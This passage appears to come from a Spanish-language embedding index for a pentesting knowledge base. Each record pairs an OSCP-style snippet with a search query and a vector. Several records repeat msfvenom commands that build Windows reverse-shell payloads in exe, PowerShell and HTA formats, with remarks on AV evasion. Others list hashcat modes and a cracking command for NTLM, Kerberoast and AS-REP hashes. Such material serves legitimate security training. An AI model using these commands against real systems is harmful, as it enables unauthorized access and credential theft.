0.08046, 0.10327, -0.00161, -0.00911, 0.00136, 0.07455, 0.00605, -0.04569, 0.06233, 0.02318, 0.03881, 0.04305, 0.00089, -0.01417, -0.00442, 0.06242, -0.01618, -0.08786, -0.00655, 0.00073, 0.03475, 0.02343, -0.0338, 0.0045, 0.02735, -0.03621, -0.00959, 0.0214, -0.00506, -0.05273, 0.01065, -0.06864, -0.02539, 0.10481, -0.0202, -0.10169, -0.02444, -0.00939, -0.01501, 0.00896, -0.00234, -0.0269, -0.03733, 0.03333, 0.03935, -0.01489, 0.01456, 0.01931]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sΓ­ solos β†’ ver AV evasion.\n\nRelacionado: Reverse shell Β· Metasploit Β· OSCP MOC", "indexar": "con que puedo generar cΓ³digo de reversiΓ³n con ofuscaciΓ³n?", "v": [-0.08686, -0.07637, -0.07077, 0.08921, -0.02122, -0.12414, 0.01841, 0.13337, -0.02882, -0.13945, -0.07069, -0.13437, 0.02621, -0.0888, 0.02515, 0.01923, 0.10467, -0.01016, -0.00148, 0.05747, 0.08476, -0.09877, 0.04312, -0.09245, 0.04497, -0.01646, 0.00754, -0.04609, -0.00652, -0.08074, 0.02847, -0.05144, 0.04498, -0.03554, -0.14925, 0.1122, 0.04185, 0.20661, -0.03532, 0.12255, -0.04868, 0.08688, -0.05482, 0.02303, 0.01618, -0.09147, -0.02691, 0.08581, -0.11965, -0.06775, -0.06167, -0.06267, -0.0889, -0.08116, -0.00042, -0.02981, 0.0944, -0.04935, -0.04663, -0.0106, 0.06892, 0.05093, -0.03273, -0.06318, 0.02401, -0.02015, 0.02578, 0.04913, -0.02694, 0.06075, -0.04416, 0.06851, -0.09413, -0.06482, 0.08252, 0.04214, -0.05089, -0.06666, 0.01203, 0.12785, -0.06967, 0.00253, -0.03097, -0.02784, 0.05452, -0.01935, 0.01912, -0.04261, 0.08422, -0.14456, 0.09989, -0.03113, 0.00905, 0.01, 0.0222, 0.01236, -0.04612, 0.16944, -0.03779, 0.10715, 0.04351, -0.0462, 0.05557, 0.07854, 0.12069, 0.08248, 0.12446, -0.0076, 0.03867, 0.02284, -0.04137, -0.09374, -0.08878, -0.02156, -0.12375, -0.07197, -0.10111, 0.01135, 0.02832, 0.00443, -0.04548, -0.03358, -0.03648, 0.02098, -0.02815, 0.05981, -0.01185, 0.0769, 0.00815, -0.05788, -0.10148, -0.00566, 0.02008, -0.00324, 0.01594, 0.00035, 0.08213, 0.05322, 0.06076, 0.04255, 0.06661, 0.06998, 0.06814, 0.12266, -0.00013, -0.01318, 0.01694, -0.11369, -0.09093, -0.07296, -0.02299, 0.1176, -0.00759, 0.01398, -0.12055, 0.05002, 0.03129, -0.05816, 0.00809, -0.041, -0.1152, 0.06189, -0.04521, -0.02406, -0.01245, 0.00107, -0.11919, -0.02467, 0.01278, 0.01686, -0.07552, -0.05518, 0.11355, -0.13613, 0.04605, -0.01526, -0.05173, -0.04994, -0.07371, -0.07454, 0.00625, 0.04049, 0.01178, -0.0666, 0.00505, -0.02271, 0.0069, 0.07545, 0.03366, 0.01893, 0.04051, 0.06405, 0.00611, -0.04229, -0.0296, -0.01209, 0.07188, 0.05855, 0.02249, -0.0536, -0.0297, 0.05195, -0.00737, -0.07897, 0.06567, 0.03934, -0.05709, 0.05516, -0.05086, 0.03702, 0.01241, -0.06822, 0.11977, -0.00423, -0.10999, 0.01074, 0.00395, 0.02935, 0.02093, 0.03002, 0.05013, 0.01641, 0.01248, -0.01062, 0.04615, -0.03389, -0.00638, 0.01685, 0.01168, 0.03313, -0.03037, 0.03752, -0.03408, 0.0135, 0.04476, 0.06834, -0.00647, -0.0434, -0.04169, -0.06384, 0.01319, 0.03397, 0.00726, -0.08186, -0.01293, -0.00815, -0.03291, -0.03314, -0.01079, 0.01718, -0.00508, -0.03797, 0.0351, -0.07426, 0.03587, -0.04222]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sΓ­ solos β†’ ver AV evasion.\n\nRelacionado: Reverse shell Β· Metasploit Β· OSCP MOC", "indexar": "cual es la herramienta para montar una conexiΓ³n inversa en sistemas Windows?", "v": [-0.00964, 0.06506, -0.1211, -0.17282, -0.06645, -0.08175, -0.16697, -0.09187, -0.08436, -0.10232, -0.07966, -0.11885, 0.01051, -0.02224, 0.04359, 0.10935, 0.05271, -0.15546, -0.01043, -0.07532, -0.12195, -0.04526, -0.05372, -0.06048, -0.12572, 0.07472, 0.00932, -0.05543, -0.17761, 0.01495, -0.01162, -0.00037, 0.08647, 0.02766, -0.16433, -0.06539, -0.05241, 0.08872, 0.08957, 0.03068, -0.00855, 0.08207, -0.02722, 0.11857, 0.06973, -0.07364, 0.09295, -0.06945, 0.08519, 0.02538, -0.11619, -0.03751, -0.12007, -0.08155, 0.03237, -0.22764, 0.17936, -0.1172, 0.05304, -0.04057, -0.06414, 0.13903, -0.13688, 0.02407, 0.02209, -0.03411, -0.03698, -0.08056, -0.04046, 0.08878, -0.01945, -0.01979, 0.0371, 0.01692, 0.05134, 0.08216, 0.09838, 0.02175, 0.08841, -0.01789, 0.00735, 0.01976, -0.06506, 0.02373, -0.00964, -0.11668, 0.01051, -0.0394, 0.06406, -0.0766, 0.02031, -0.01807, -0.04005, 0.01497, 0.06151, -0.12459, -0.00509, -0.00271, -0.05852, 0.03201, -0.01086, -0.06482, -0.0506, 0.13248, -0.08576, -0.02616, -0.01028, -0.03698, -0.01392, -0.01167, 0.04219, 0.07459, 0.03045, 0.02683, -0.01107, -0.04951, 0.05727, -0.01033, -0.07228, -0.01424, -0.03812, 0.07987, -0.02739, -0.04412, 0.05001, -0.02957, 0.03867, 0.10581, -0.06952, 0.00585, 0.02672, -0.03104, -0.06367, -0.03358, -0.05947, 0.01943, 0.05826, -0.09884, 0.00012, -0.05611, 0.05691, 0.04814, 0.00082, -0.10885, 0.02296, 0.06108, 0.14154, -0.04854, -0.04822, -0.01034, -0.01897, 0.06721, -0.07441, -0.01385, -0.02846, 0.00775, -0.02573, 0.04891, -0.01993, 0.03052, -0.00626, -0.02808, 0.03874, -0.0234, -0.02137, -0.0445, -0.03114, 0.06031, 0.09573, -0.01638, -0.00023, 0.07429, 0.02649, 0.02763, 0.03154, 0.00034, -0.03678, 0.01309, -0.01922, -0.04321, -0.09804, -0.0077, 0.03359, -0.09528, 0.00051, 0.05962, -0.00952, 0.02802, -0.00776, 0.05057, -0.03787, -0.02023, 0.00576, -0.03133, 0.04969, -0.00418, -0.04334, -0.06262, 0.08391, 0.05725, -0.00977, -0.02258, 0.03347, -0.04664, 0.03578, 0.07646, -0.0189, 0.03615, 0.04725, 0.03213, 0.01765, 0.02188, -0.01681, -0.0128, -0.02846, -0.06899, 0.01538, 0.0096, -0.07094, -0.00616, 0.03211, -0.00826, 0.03451, 0.02031, 0.00028, -0.04662, -0.05843, 0.02904, -0.04303, -0.04073, -0.00073, -0.04439, 0.02723, 0.00473, 0.00655, -0.01714, 0.01556, -0.06185, -0.00014, -0.03141, 0.0086, 0.095, 0.02344, -0.10069, -0.04397, -0.02865, -0.03231, -0.03177, -0.02694, -0.07847, -0.02772, 0.00691, 0.00913, -0.04044, -0.01056, -0.00907]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Cracking de contraseΓ±as\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "indexar": "que herramienta sirve para generar listas de contraseΓ±as", "v": [0.14557, 0.03185, -0.14691, -0.22706, 0.024, -0.20412, -0.08021, -0.08584, -0.01895, -0.09, -0.05471, -0.02379, -0.00239, -0.11717, 0.07543, 0.07775, 0.09424, -0.12251, 0.02231, 0.08375, -0.02699, 0.03583, -0.06867, -0.07312, -0.11629, -0.06175, 0.07064, -0.0857, -0.19076, 0.1157, 0.01634, -0.02759, 0.02205, -0.08638, -0.06916, 0.05447, -0.01594, 0.11854, -0.04372, 0.07579, 0.05535, 0.10943, -0.14999, 0.07282, -0.07059, -0.02559, 0.01074, 0.07619, 0.07421, 0.0821, -0.0634, -0.16554, -0.10758, -0.03475, -0.01486, -0.15012, 0.12781, -0.1033, -0.01119, -0.0777, -0.1985, 0.01695, -0.00039, 0.01808, -0.1173, -0.0343, 0.01967, -0.01801, -0.08741, 0.07937, -0.05275, 0.0271, 0.05272, -0.00116, -0.00313, -0.02419, 0.06166, 0.02955, -0.03173, 0.10966, -0.00703, -0.05433, -0.02143, -0.01649, -0.10542, -0.02157, 0.09721, -0.00379, 0.07561, -0.09327, -0.01022, 0.05607, 0.00184, 0.06143, 0.05585, -0.02875, 0.02889, -0.001, -0.02706, -0.03187, 0.07876, -0.03213, -0.02535, 0.10141, -0.02079, 0.01886, -0.01975, 0.0305, -0.0451, -0.05032, 0.0724, 0.00802, -0.00643, -0.00394, 0.00392, 0.03404, -0.03682, -0.07868, 0.03247, -0.03304, 0.02393, 0.01918, -0.05634, -0.00422, 0.01327, 0.08488, 0.01475, 0.03415, -0.0536, -0.10894, 0.00596, -0.01484, -0.08842, 0.00877, -0.03934, -0.01581, 0.00792, -0.14697, -0.0559, -0.01635, 0.01191, 0.04991, -0.01159, -0.07263, 0.01237, 0.03092, 0.07136, -0.02507, -0.04001, 0.0128, 0.01969, -0.07191, 0.01104, 0.03512, -0.05425, 0.02267, -0.07496, -0.05375, -0.08375, 0.10305, -0.01463, -0.06532, -0.02168, 0.029, -0.03034, -0.00906, 0.04327, 0.07171, 0.08674, 0.07324, 0.05031, 0.05662, 0.09062, -0.07682, -0.03243, -0.05574, -0.03208, -0.04484, -0.01877, -0.08666, -0.0544, -0.04974, -0.04477, -0.02186, 0.02327, -0.05943, 0.08109, -0.02885, -0.0059, 0.0376, -0.01883, 0.00119, -0.03562, -0.02101, 0.04143, -0.00133, 0.01775, -0.05467, 0.00735, -0.08265, -0.0082, -0.02823, -0.04743, -0.04429, 0.03442, 0.06699, -0.0642, -0.0549, -0.01526, 0.01343, 0.05131, 0.01066, -0.00692, -0.0194, -0.04976, -0.07309, -0.05041, 0.01467, -0.01478, -0.01734, 0.03992, 0.00162, 0.02669, 0.02576, 0.00378, 0.03319, 0.00374, -0.00504, 0.04201, -0.01813, 0.03081, 0.01216, -0.00549, -0.00391, 0.05983, -0.06286, -0.03145, -0.02973, -0.03018, -0.01527, -0.03321, 0.03626, 0.02897, -0.05326, -0.05137, -0.03429, 0.02927, -0.02782, 0.00217, -0.08021, -0.0809, 0.00938, 0.03861, 0.01684, 0.04019, -0.06352]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Cracking de contraseΓ±as\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "indexar": "con que puedo romper hashes de contraseΓ±as sin conexiΓ³n a internet", "v": [0.11582, 0.0141, -0.12826, -0.09836, -0.03687, -0.05951, -0.06393, -0.04215, -0.05817, 0.03134, -0.04334, 0.01231, 0.0228, -0.04025, 0.08945, 0.03033, 0.03809, 0.08844, 0.0621, 0.01387, -0.04276, 0.01857, -0.09117, -0.00373, 0.04544, -0.09862, -0.03807, 0.11742, -0.10823, -0.0895, -0.11356, -0.11003, 0.02453, 0.16212, -0.1158, 0.08231, -0.01156, 0.2372, 0.10377, -0.01232, 0.11529, 0.07818, -0.1498, 0.10146, -0.00257, -0.03611, -0.03677, -0.04747, 0.1066, -0.00448, -0.0458, -0.00505, -0.18678, -0.07815, -0.04614, -0.08864, 0.12597, 0.00732, -0.00247, 0.00584, -0.136, 0.0419, 0.01555, 0.03208, -0.03372, -0.00395, 0.00805, 0.00024, -0.08144, 0.16528, 0.06999, 0.06845, -0.08977, -0.01606, 0.0876, 0.09739, 0.02437, -0.06742, 0.02284, 0.09603, -0.03771, 0.00425, 0.08497, -0.00541, -0.14329, 0.01535, 0.0036, -0.09652, 0.07876, -0.03828, 0.06894, 0.07146, -0.04829, -0.06426, 0.00213, -0.07794, -0.01222, -0.06841, -0.06962, -0.03138, -0.06003, 0.14401, -0.10329, 0.14341, -0.06261, -0.0544, 0.05117, 0.07168, 0.05565, -0.07363, 0.11098, -0.01592, -0.01383, -0.0751, -0.0383, -0.0359, -0.01318, -0.04653, -0.05255, 0.0015, -0.02733, -0.06185, 0.02917, 0.04266, 0.0465, 0.09835, 0.03004, 0.03996, -0.05304, -0.06303, 0.00668, -0.02828, -0.04029, -0.0946, 0.02678, 0.08117, -0.00473, -0.14166, -0.02183, -0.06796, 0.01688, -0.06211, -0.07547, 0.02734, 0.06382, 0.0523, 0.00381, -0.01789, -0.10109, -0.02129, -0.06299, 0.04304, -0.04611, 0.04384, -0.04204, 0.09934, -0.06163, -0.05168, -0.01143, 0.10294, -0.02772, -0.02136, 0.00342, 0.01046, -0.06377, 0.04969, -0.04613, 0.07064, 0.04305, 0.04543, -0.04243, 0.03054, -0.0219, -0.02941, -0.02091, 0.00646, -0.03574, -0.01834, -0.04906, -0.05487, -0.01225, -0.07244, -0.0384, -0.02264, -0.04152, -0.00662, 0.03341, 0.0015, -0.03805, -0.00454, 0.0219, -0.03435, -0.06996, 0.1456, 0.06909, -0.02318, 0.01274, 0.01762, 0.03188, -0.04018, -0.02307, -0.01814, 0.00989, -0.02149, 0.00549, 0.03201, -0.03812, -0.07289, -0.03715, 0.01409, 0.0049, -0.04057, 0.00815, -0.08821, -0.0617, -0.02877, 0.01667, -0.02043, -0.05589, 0.0231, 0.00171, 0.03537, 0.03409, 0.05127, 0.04915, -0.00026, -0.03032, 0.00769, 0.02558, -0.01034, -0.00762, -0.02022, -0.05261, -0.01335, 0.01295, -0.04063, -0.07262, -0.04492, -0.05827, 0.02267, -0.07007, 0.04195, 0.0164, -0.02493, 0.03736, -0.04298, -0.06821, 0.00465, -0.00904, -0.00348, -0.06452, 0.01642, 0.01439, 0.01721, 0.00164, 0.0136]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Cracking de contraseΓ±as\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "indexar": "cual es un programa para atacar credenciales en lΓ­nea y fuera de lΓ­nea", "v": [-0.07318, 0.07935, -0.04752, -3e-05, 0.05955, -0.09088, 0.02941, 0.04162, -0.10322, 0.0227, -0.01295, -0.06501, -0.0605, -0.03346, 0.09244, -0.00711, -0.03579, 0.04109, 0.15344, -0.02473, -0.08971, 0.01339, -0.02111, -0.09502, -0.07806, -0.01329, 0.02989, -0.00367, -0.01452, 0.02884, -0.06676, 0.05359, 0.12208, 0.0222, 0.05622, -0.0062, -0.0635, 0.15494, 0.07986, 0.15122, -0.05876, 0.01952, -0.09541, -0.06837, 0.07412, -0.0508, 0.02098, 0.08564, 0.00043, -0.07182, -0.03301, 0.05324, 0.02556, -0.00053, 0.02831, -0.03725, 0.03435, -0.11262, 0.02666, 0.02894, -0.06083, -0.09582, 0.08136, -0.14904, 0.06617, 0.04287, -0.01413, -0.10443, -0.15848, -0.04039, 0.01082, 0.0635, 0.03223, -0.00779, -0.01485, -0.03312, -0.03287, 0.0262, 0.06417, -0.07467, 0.06065, -0.02148, -8e-05, 0.10743, -0.03564, 0.00174, -0.01801, -0.03621, -0.06884, 0.05545, 0.07267, 0.09194, -0.10489, 0.04149, -0.09489, -0.10015, 0.03342, -0.02662, 0.04978, -0.02879, -0.03373, -0.06142, -0.20291, 0.15336, -0.06126, 0.04444, 0.03859, 0.02695, -0.03421, 0.02096, -0.01685, -0.10622, -0.01357, -0.01, 0.00645, -0.06172, -0.02991, 0.00665, 0.06, -0.08099, -0.05713, -0.00483, 0.03988, -0.01823, 0.10018, 0.03902, -0.12014, 0.03584, -0.03215, -0.03927, -0.06575, 0.06999, 0.01447, -0.08846, -0.06636, -0.05016, -0.02441, -0.04306, -0.03252, -0.06607, 0.08441, 0.06974, -0.03132, 0.04804, -0.01936, -0.01937, -0.02684, -0.19543, -0.10093, -0.0055, 0.02444, 0.13763, -0.05693, 0.12334, -0.04035, -0.02844, 0.03423, 0.05087, -0.02584, 0.06921, -0.06226, -0.01498, 0.04578, -0.04912, 0.02893, -0.05161, -0.04596, -0.0212, 0.05018, 0.03585, 0.00655, 0.06757, -0.01041, -0.06894, -0.0229, -0.05654, -0.02805, -0.05646, 0.09, -0.0279, -0.11584, -0.00012, 0.04462, -0.03041, -0.10253, 0.01034, -0.04816, 0.02464, 0.0384, 0.03389, 0.05073, -0.02833, -0.05621, 0.03691, -0.01629, -0.01561, 0.00935, 0.01502, 0.06325, -0.06652, -0.10742, -0.0297, -0.01256, -0.062, 0.04528, 0.11758, 0.01795, -0.05936, -0.01026, 0.13806, 0.05346, -0.11051, 0.08371, -0.04711, -0.09471, -0.05224, -0.00073, -0.04878, 0.02688, 0.06512, 0.00901, -0.00029, -0.01262, 0.05251, -0.01242, -0.03159, -0.03638, -0.01916, -0.02493, 0.02786, -0.04052, -0.09358, -0.02013, -0.08916, 0.06314, 0.00575, 0.09279, -0.00127, -0.05568, -0.08936, -0.0361, 0.08313, -0.03957, -0.01861, 0.01074, -0.03352, -0.07028, 0.03883, 0.00394, -0.0306, -0.06027, -0.00262, 0.05391, 0.00051, 0.09515, 0.01001]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## hashcat β€” los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder β†’ Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) β†’ Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) β†’ AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "indexar": "que herramientas hay para rogar contraseΓ±as con NTLM?", "v": [-0.00956, -0.06577, -0.00455, -0.211, -0.02254, -0.09041, -0.14171, 0.09309, -0.00268, 0.11972, -0.06558, 0.01493, 0.10984, -0.05495, 0.01469, 0.11782, -0.06227, -0.12975, 0.03211, 0.11566, -0.12621, 0.03723, -0.14922, -0.03384, -0.01308, -0.10805, 0.04794, -0.06633, -0.12837, 0.12879, -0.06825, -0.06532, -0.02024, 0.03225, -0.00325, 0.0081, 0.07818, 0.06825, 0.04408, 0.13009, 0.11725, 0.13201, -0.04056, 0.14874, 0.09069, -0.04052, -0.02454, -0.03997, 0.15945, -0.06804, -0.1055, -0.06495, -0.0239, -0.13948, -0.06715, -0.10896, 0.20109, 0.03212, 0.01002, -0.04183, -0.14805, 0.022, 0.0078, 0.0252, -0.16234, -0.05356, 0.05582, -0.05149, -0.10037, 0.09477, -0.08532, -0.04268, 0.04257, -0.02755, -0.01358, -0.05289, 0.06536, 0.01346, 0.01211, 0.12181, -0.03357, -0.058, -0.02291, -0.02151, -0.10474, -0.00829, 0.04586, -0.01328, 0.06206, -0.05795, -0.00214, 0.04432, -0.00348, -0.01163, 0.03464, -0.07301, 0.02404, -0.03175, 0.00877, -0.04707, 0.03804, 0.00455, 0.08038, 0.11303, -0.14918, -0.0373, -0.02273, 0.05171, -0.023, 0.00947, 0.06627, 0.05852, -0.01403, 0.00124, 0.03846, 0.03501, -0.00347, -0.11347, 0.05302, -0.04184, 0.01552, -0.0124, -0.02054, 0.04475, 0.01693, 0.03977, 0.03013, 0.05101, -0.08142, -0.14645, 0.0408, -0.09516, -0.06061, 0.03106, 0.03741, 0.00816, -0.0114, -0.15071, -0.07852, -0.04569, 0.00111, -0.00728, -0.04813, -0.02138, 0.05353, 0.04756, 0.003, -0.02599, 0.01318, -0.02519, 0.04626, -0.00787, 0.02379, 0.01012, -0.02193, 0.01782, -0.04542, -0.00062, -0.1157, 0.07872, 0.0292, -0.02983, -0.04229, 0.01126, -0.07479, -0.01566, 0.06254, 0.08164, 0.01465, 0.01041, 0.03802, 0.08019, 0.05225, -0.03738, -0.0223, -0.04189, 0.04292, -0.07497, -0.03939, -0.10196, 0.04258, -0.02135, -0.00068, -0.00509, 0.06396, -0.05701, 0.07718, 0.00841, -0.06347, 0.00798, -0.03666, -0.00201, -0.04936, -0.03028, 0.05084, -0.00819, -0.00864, -0.04553, -0.01867, -0.02143, -0.02105, 0.02133, -0.04649, -0.06981, -0.00659, 0.03941, -0.07865, -0.03465, -0.02932, -0.00176, 0.04675, 0.00102, 0.01196, -0.06694, -0.07967, -0.03934, -0.02609, 0.0622, -0.01263, -0.01177, 0.00777, -0.01036, 0.03155, 0.02736, 0.02029, -0.04025, -0.03025, 0.01248, 0.03937, -0.01577, 0.02787, -0.01896, 0.00096, 0.02545, 0.01167, -0.04266, -0.06237, -0.03662, -0.03157, -0.00111, -0.03647, -0.00351, 0.06006, -0.04413, -0.06525, 0.00884, -0.01063, -0.07347, -0.01281, 0.02168, -0.01001, -0.03067, -0.00414, 0.01415, -0.05741, -0.02578]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## hashcat β€” los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder β†’ Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) β†’ Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) β†’ AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "indexar": "con que puedo hacer un ataque de Kerberoasting?", "v": [-0.13057, 0.00828, -0.0615, 0.04604, -0.12627, -0.0518, 0.03725, 0.2868, 0.01665, -0.03943, -0.03141, -0.01987, -0.01584, -0.09316, 0.12087, 0.01926, -0.05516, 0.08568, 0.15096, 0.00545, 0.12896, 0.09244, 0.02476, 0.02877, -0.07011, 0.06766, -0.03392, 0.08769, -0.078, -0.02202, -0.15916, -0.02189, 0.00161, 0.00278, 0.09407, -0.0248, -0.11049, 0.16913, 0.11867, 0.15828, -0.07841, 0.00872, -0.08307, -0.00621, 0.04541, 0.04219, 0.00691, -0.04177, 0.09115, 0.00476, 0.12534, -0.00378, -0.13725, -0.11735, -0.0134, -0.05718, 0.08291, -0.16401, -0.0248, -0.01851, -0.03734, -0.00458, -0.08065, -0.07629, 0.02586, -0.10522, -0.00363, 0.00171, 0.01594, -0.01858, 0.01585, 0.05957, 0.03893, 0.05319, 0.06221, 0.04407, 0.01981, 0.1041, -0.00599, 0.01618, -0.08417, 0.00169, -0.05405, 0.00642, -0.03934, -0.09487, 0.04571, -0.08594, -0.06838, -0.07331, 0.00406, 0.01235, -0.01073, -0.06876, -0.10105, -0.04292, -0.12347, -0.05115, -0.03134, -0.02987, -0.02446, -0.09103, -0.09329, 0.0446, 0.01856, -0.01811, -0.0642, 0.0145, 0.01705, -0.1488, -0.03483, -0.0291, -0.0917, -0.13253, -0.00827, 0.03366, -0.13206, 0.02762, 0.04205, 0.10115, -0.11538, 0.02654, -0.03289, 0.009, -0.06851, -0.01323, 0.01789, -0.011, -0.09795, 0.00675, -0.00358, 0.04475, 0.06382, -0.01558, -0.01564, 0.06435, -0.03359, -0.10765, -0.04152, 0.03498, -0.00255, 0.11312, -0.00391, 0.0061, -0.05072, 0.01332, -0.05011, 0.01198, -0.10543, -0.02198, 0.02186, 0.02415, -0.03145, 0.08583, -0.02291, -0.06089, 0.00338, -0.01276, 0.04262, 0.11335, 0.00254, 0.05217, -0.03021, 0.08177, 0.05125, 0.00321, 0.00415, -0.06811, 0.06303, 0.05217, -0.04364, 0.03977, 0.02295, 0.01739, 0.03994, -0.03363, 0.03057, -0.00904, 0.00859, 0.00801, 0.05695, -0.06894, -0.05646, 0.0162, 0.00824, -0.0255, 0.08323, 0.02899, 0.02121, 0.03149, -0.01639, 0.00857, 0.00463, 0.05217, 0.04145, -0.08355, -1e-05, 0.05174, -0.03248, 0.01939, -0.05067, -0.03573, -0.01215, -0.02648, 0.06218, 0.0969, -0.06958, -0.00779, -0.0279, 0.06591, 0.02773, -0.04034, 0.1063, -0.09111, -0.10802, 0.0378, 0.04647, -0.02835, -0.01355, 0.00516, 0.05786, 0.01969, 0.04042, 0.04116, 0.03063, -0.01515, -0.04293, -0.06535, -0.0065, 0.01119, -0.02654, -0.06245, 0.0213, -0.03611, 0.01445, -0.02887, -0.01607, 0.02619, -0.08359, 0.03819, 0.00645, -0.04218, 0.03157, 0.04652, -0.01219, -0.0656, -0.04914, 0.01958, -0.00865, -0.02959, 0.00086, -0.00926, -0.00359, 0.01443, 0.05776, -0.00496]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## hashcat β€” los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder β†’ Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) β†’ Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) β†’ AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "indexar": "cual es una alternativa libre a hashcat para salir en modo MD5?", "v": [-0.06304, -0.06122, -0.05343, 0.04692, -0.2625, -0.01193, -0.19299, 0.03578, -0.15117, 0.07939, -0.05541, -0.17033, 0.04789, -0.08184, -0.02621, -0.00239, 0.06548, -0.03955, 0.00451, -0.03802, -0.04234, -0.0188, -0.08911, -0.0923, -0.04959, -0.01359, -0.03177, 0.15299, -0.28047, 0.01128, 0.02216, 0.02716, -0.16226, 0.10441, -0.06414, 0.06401, 0.09443, 0.07644, 0.07482, 0.02281, -0.06764, 0.00997, -0.05685, 0.03955, 0.0498, -0.17172, -0.07708, 0.04598, 0.00532, 0.05648, 0.02007, -0.04538, -0.07354, 0.08469, 0.09143, 0.03608, 0.08935, -0.04776, -0.12402, -0.00243, -0.06534, 0.05221, -0.01114, -0.0672, -0.06635, 0.00806, 0.00063, 0.07294, -0.03881, 0.09299, -0.00587, 0.02158, 0.01564, -0.04302, -0.12465, 0.08438, -0.09327, -0.06917, 0.05611, 0.12686, 0.05256, -0.07443, 0.0152, 0.07989, -0.07217, -0.04937, 0.03158, -0.1093, 0.03934, 0.0783, 0.08228, 0.05458, -0.04446, 0.04197, -0.07293, -0.07338, 0.06362, 0.05736, -0.00683, 0.00221, 0.02261, 0.04709, -0.12121, 0.0569, -0.03746, -0.04946, 0.01285, -0.00574, -0.05665, 0.03651, 0.03676, 0.03344, 0.04736, -0.01321, -0.03229, -0.03395, -0.01761, 0.04631, -0.01871, -0.00154, -0.02252, 0.00538, 0.01308, -0.0781, 0.10228, 0.01526, -0.03298, 0.00537, -0.0145, 0.02876, 0.06335, -0.03851, -0.11804, -0.06223, -0.04699, -0.01535, 0.10138, 0.05733, 0.00019, -0.00022, 0.07032, -0.02837, 0.01186, 0.00401, 0.02569, -0.03672, -0.01137, -0.04589, 0.02879, -0.08747, -0.0482, 0.03593, -0.04997, 0.0268, -0.01317, -0.01431, -0.05605, -0.02402, -0.07263, 0.09553, 0.0261, 0.00387, 0.01646, 0.04039, 0.01599, -0.04375, 0.01665, -0.02842, -0.03933, 0.04148, 0.07864, 0.03996, 0.02601, -0.05824, 0.08035, -0.03553, 0.0032, 